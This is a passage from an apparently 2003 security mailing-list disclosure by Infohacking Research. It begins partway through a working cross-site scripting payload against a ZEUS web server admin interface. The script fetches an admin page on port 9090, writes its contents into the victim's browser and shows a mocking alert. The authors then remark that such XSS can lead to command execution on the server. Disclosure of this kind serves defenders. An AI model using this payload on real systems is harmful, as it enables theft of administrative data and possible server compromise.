>:9090/apps/web/global.fcgi",false);xmlHttp.send
();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%
20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%
20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")
</script>
This is for IE, for other browsers you may modify this code.
Imagination is the best friend of the attacker. Open your minds, XSS does
not only means execution of commands on the client side... succefully
exploited, in some scenarios (like web admin interfaces) those bugs can
lead on execution of commands on the server side...
See you,
Hugo Vázquez Caramés & Toni Cortés Martínez
INFOHACKING RESEARCH 2003
www.infohacking.com
Barcelona
Spain
This archive was generated by hypermail 2b30
: Thu May 29 2003 - 22:45:59 PDT